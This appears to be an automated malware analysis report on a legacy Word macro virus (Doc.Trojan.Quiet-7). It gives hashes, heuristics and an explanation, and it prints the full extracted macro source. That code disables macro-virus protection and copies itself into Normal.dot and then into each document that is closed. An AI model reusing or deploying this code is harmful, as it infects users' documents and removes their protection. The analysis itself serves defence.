Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 52c63b70a1932a37…

MALICIOUS

Office (OLE)

Size: 26.0 KB
Created: 1997-07-07 09:37:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 8c70e9fbc55eeff6602e27a2142ea22d
SHA-1: 34683a57d79568f1e48b16893bea6f646a969ac9
SHA-256: 52c63b70a1932a37bdea76a08f81b0a65d4cd993fa25df27e3b3514d82a5be44
Risk score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is a legacy Word 97 document containing a WordBasic AutoClose macro. When the document is closed, the macro first disables Word's macro-virus protection (Options.VirusProtection = False), then compares the first line of its own code module with that of the Normal.dot template and, if they differ, replaces the template's module with a copy of its own lines and rewrites the third line as 'Sub AutoClose()'. If the macro is already running from Normal.dot, it copies in the opposite direction, into the active document. The effect is a classic macro-virus infection loop: persistence in the global template and spread to every document subsequently opened and closed.

Heuristics (4)

  • ClamAV: Doc.Trojan.Quiet-7 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Quiet-7
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Close macro (severity: high; rule: OLE_VBA_AUTOCLOSE)
    Document contains an Auto_Close macro, which runs automatically when the document is closed
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 909 bytes
SHA-256: a30eff2a8535594f2807b9b904170e174f8068c78704b191ac36087ceecc0c4a
Detection: ClamAV: Doc.Trojan.Quiet-7
Obfuscation or payload: unlikely
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Дебилизатор v 4.1  Copyright(c) Slim Fox, 1997 - 2000

Sub AutoClose()
    Options.VirusProtection = False
    On Error GoTo exit_1
    Set ud = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    If ud.Lines(1, 1) = nt.Lines(1, 1) Then GoTo exit_1
    If MacroContainer = "Normal.dot" Then
        Set tm = ud
        Set ud = nt
        Set nt = tm
    End If
    nt.deletelines 1, nt.CountofLines
    Count = ud.CountofLines
    ls = ud.Lines(1, Count)
    nt.InsertLines 1, ls
    nt.replaceline 3, "Sub AutoClose()"
   'sss
exit_1:
End Sub